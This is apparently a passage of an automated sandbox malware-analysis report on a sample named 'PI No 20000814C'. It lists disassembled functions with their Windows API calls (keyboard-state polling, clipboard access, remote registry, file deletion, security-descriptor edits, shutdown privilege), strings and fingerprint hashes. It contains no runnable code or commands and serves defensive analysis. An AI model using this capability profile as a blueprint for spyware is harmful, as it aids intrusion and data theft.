                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 448f4fe239307c6e9495d638aa88d19fc8cda6b48c3aabefe7b041d79a1c5925
                                    • Instruction ID: 7a3044901355aba6e7c22378495530879220a4486ee32f9645eec76eaba59c18
                                    • Opcode Fuzzy Hash: 448f4fe239307c6e9495d638aa88d19fc8cda6b48c3aabefe7b041d79a1c5925
                                    • Instruction Fuzzy Hash: 64817B716083059FDB10EF24C985AABBBE8FF88324F14492DF99597291D730D905EBA2
                                    Function 00F581F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                      • Part of subcall function 00F5874A: GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                      • Part of subcall function 00F5874A: GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                      • Part of subcall function 00F5874A: RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                      • Part of subcall function 00F587E7: GetProcessHeap.KERNEL32(00000008,00F58240,00000000,00000000,?,00F58240,?), ref: 00F587F3
                                      • Part of subcall function 00F587E7: RtlAllocateHeap.NTDLL(00000000,?,00F58240), ref: 00F587FA
                                      • Part of subcall function 00F587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F58240,?), ref: 00F5880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F5825B
                                    • _memset.LIBCMT ref: 00F58270
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F5828F
                                    • GetLengthSid.ADVAPI32(?), ref: 00F582A0
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F582DD
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F582F9
                                    • GetLengthSid.ADVAPI32(?), ref: 00F58316
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F58325
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F5832C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F5834D
                                    • CopySid.ADVAPI32(00000000), ref: 00F58354
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F58385
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F583AB
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F583BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
                                    • Instruction ID: 93a69b97023ea721898be01c0f3db8fe5c550e90383fcfc92988ec5500f96d43
                                    • Opcode Fuzzy Hash: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
                                    • Instruction Fuzzy Hash: 85616C71900209EFDF00DFA4DC84AEEBBB9FF04751F148169F915A7291DB359A0AEB60
                                    Function 00F16843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: 93ba877877d1dc93ce5debb36ea973a52736b4e51138eb079ad8adfd0a398b46
                                    • Instruction ID: 61500298e49a56824797ad4d8f997f6c1059b6c603be2411866f03ce055214ee
                                    • Opcode Fuzzy Hash: 93ba877877d1dc93ce5debb36ea973a52736b4e51138eb079ad8adfd0a398b46
                                    • Instruction Fuzzy Hash: 7A729171E002199BDB24CF59D8807EEB7B5FF48321F14816AE945EB280EB749D85EF90
                                    Function 00F80665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80737
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F807D6
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8086E
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F80AAD
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: e791b9de43456374a6ba77d30f9ecda3178bc12db2f651cb9f8a8402dfb17392
                                    • Instruction ID: 414c6f99b2ee0ff46649c82168352ffe3159aca76d6e5d5c6da30f0e479afc7d
                                    • Opcode Fuzzy Hash: e791b9de43456374a6ba77d30f9ecda3178bc12db2f651cb9f8a8402dfb17392
                                    • Instruction Fuzzy Hash: CAE14F31604310AFCB14EF28CC95E6ABBE4FF89714B04856DF859DB2A2DB34E905EB51
                                    Function 00F60219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00F60241
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F602C2
                                    • GetKeyState.USER32(000000A0), ref: 00F602DD
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F602F7
                                    • GetKeyState.USER32(000000A1), ref: 00F6030C
                                    • GetAsyncKeyState.USER32(00000011), ref: 00F60324
                                    • GetKeyState.USER32(00000011), ref: 00F60336
                                    • GetAsyncKeyState.USER32(00000012), ref: 00F6034E
                                    • GetKeyState.USER32(00000012), ref: 00F60360
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F60378
                                    • GetKeyState.USER32(0000005B), ref: 00F6038A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 6b3dd9e58a2e09e55cc2c2b2c47ec428362b92945bd6f639efd13b57c2b46cb3
                                    • Instruction ID: 175b43c13efed516760dc7566d29c2ce7b5d371b1e435bc3abaff4e5eaca63d4
                                    • Opcode Fuzzy Hash: 6b3dd9e58a2e09e55cc2c2b2c47ec428362b92945bd6f639efd13b57c2b46cb3
                                    • Instruction Fuzzy Hash: 7741CB34D047C96EFF314A6488193F7BEA0AF12361F28409DD5C5466C2EF945DC8A792
                                    Function 00F74458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 6f8c9c1aac370d2c75b74b3e637eea4deb720c61233441b85afb1011cafbb92b
                                    • Instruction ID: 20fee2fab0f5f920033bee8d3c93669f4fb720ea59005214e95fcebe5a6191b8
                                    • Opcode Fuzzy Hash: 6f8c9c1aac370d2c75b74b3e637eea4deb720c61233441b85afb1011cafbb92b
                                    • Instruction Fuzzy Hash: 6B2181357002149FDB10AF64EC09BB977A8EF04725F14C02AF94ADB2A2DB78AD05FB55
                                    Function 00F63A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                      • Part of subcall function 00F64CD3: GetFileAttributesW.KERNEL32(?,00F63947), ref: 00F64CD4
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F63ADF
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F63B87
                                    • MoveFileW.KERNEL32(?,?), ref: 00F63B9A
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F63BB7
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F63BD9
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F63BF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 4002782344-1173974218
                                    • Opcode ID: bcd56f8fa9b158174bff56f6ce49784f11364ace1bdf20dbb8675e5f534d5f51
                                    • Instruction ID: 69793cad1431536a741e49c872588734f3a94f4c96ce6eb4b4c80079e1a53641
                                    • Opcode Fuzzy Hash: bcd56f8fa9b158174bff56f6ce49784f11364ace1bdf20dbb8675e5f534d5f51
                                    • Instruction Fuzzy Hash: 17515F31D0124D9ACF15EBA0CD929EDB7B8AF54300F6441A9E44277091DF296F09FBA0
                                    Function 00F6F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F6F6AB
                                    • Sleep.KERNEL32(0000000A), ref: 00F6F6DB
                                    • _wcscmp.LIBCMT ref: 00F6F6EF
                                    • _wcscmp.LIBCMT ref: 00F6F70A
                                    • FindNextFileW.KERNEL32(?,?), ref: 00F6F7A8
                                    • FindClose.KERNEL32(00000000), ref: 00F6F7BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    • API String ID: 713712311-438819550
                                    • Opcode ID: 954290e3ea48d716ec6f9c6d5bfe7741da48e866be97c1b1a77bad7adc11f6ce
                                    • Instruction ID: 7e61ad45dee375ffce327e578a94555e19becc6ebc18d906cbd188dfa2f438b5
                                    • Opcode Fuzzy Hash: 954290e3ea48d716ec6f9c6d5bfe7741da48e866be97c1b1a77bad7adc11f6ce
                                    • Instruction Fuzzy Hash: 15417F71D0021E9FCF11DF64DC85AEEBBB4FF05310F144566E815A21A1DB34AE88EB90
                                    Function 00F8D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetSystemMetrics.USER32(0000000F), ref: 00F8D78A
                                    • GetSystemMetrics.USER32(0000000F), ref: 00F8D7AA
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F8D9E5
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F8DA03
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F8DA24
                                    • ShowWindow.USER32(00000003,00000000), ref: 00F8DA43
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F8DA68
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F8DA8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                    • String ID:
                                    • API String ID: 830902736-0
                                    • Opcode ID: 9b8dcee2fe3069b48cec156671f2fdac628d6a7cacbfd0d6388cbb7c8cd7bb5b
                                    • Instruction ID: b24825f187309333884aef2176cbd103911fffef5b787b64d43cf7ed5524a7e8
                                    • Opcode Fuzzy Hash: 9b8dcee2fe3069b48cec156671f2fdac628d6a7cacbfd0d6388cbb7c8cd7bb5b
                                    • Instruction Fuzzy Hash: 7AB19A71A00219EFDF18DF68C9857FD7BB1BF44710F188069EC48AB296D734A950EB50
                                    Function 00F14140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: 970adadae420ca6afae562b7fa05fff0bce5fb76e5a569a6557515345e166e76
                                    • Instruction ID: beeb4daaf0429a8d70f48a8bd9ae39dea0361cd76bbdd0d111a58638353deccf
                                    • Opcode Fuzzy Hash: 970adadae420ca6afae562b7fa05fff0bce5fb76e5a569a6557515345e166e76
                                    • Instruction Fuzzy Hash: A4A29F75E0421ACBDF24DF58C9907EDB7B1BF94324F2481AAD856A7280D734AEC1EB50
                                    Function 00F158C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 4d774c4dea18f7fa4688114a1b20ee6003087779ade742c7385e729638ba741d
                                    • Instruction ID: a34d0e9048dc1626c3ede85e3f48d12c8c7bb5e176b67a4aa04359f85f62cef5
                                    • Opcode Fuzzy Hash: 4d774c4dea18f7fa4688114a1b20ee6003087779ade742c7385e729638ba741d
                                    • Instruction Fuzzy Hash: 89129E70A00609DFDF14DFA4D981AEEB7B5FF88300F104669E806E7291EB39AD55EB50
                                    Function 00F8C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • ReleaseCapture.USER32 ref: 00F8C2F0
                                    • SetWindowTextW.USER32(?,00000000), ref: 00F8C39A
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F8C3AD
                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F8C48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 973565025-2107944366
                                    • Opcode ID: 6d6f63f97a2eae8edc25071ee10b7d22347cc7c25563bff5a2ee7e4a864f3c06
                                    • Instruction ID: e89724ec2523b47ddb5c186b840350350b71f132a65394ce936be6debf46525c
                                    • Opcode Fuzzy Hash: 6d6f63f97a2eae8edc25071ee10b7d22347cc7c25563bff5a2ee7e4a864f3c06
                                    • Instruction Fuzzy Hash: 6351AE70608309AFD700EF14CC56FAA7BE0EF88314F00451DF5918B2E1DB75A949EB62
                                    Function 00F6545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                      • Part of subcall function 00F58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                      • Part of subcall function 00F58CC3: GetLastError.KERNEL32 ref: 00F58D47
                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F6549B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: 95030dea2ca2bfbaf6e2d0bad5709a8ada3dfddf411f830f3ee6a6e169cedf8c
                                    • Instruction ID: 1e9f134feae129d7a1268869ef645096f133529bf3ca5ac5e84e9f541858b7a1
                                    • Opcode Fuzzy Hash: 95030dea2ca2bfbaf6e2d0bad5709a8ada3dfddf411f830f3ee6a6e169cedf8c
                                    • Instruction Fuzzy Hash: 3B014C71B54A051EE728D374EC6ABB67258EB04BA3F3402A1FD06F60C2DE554C847290
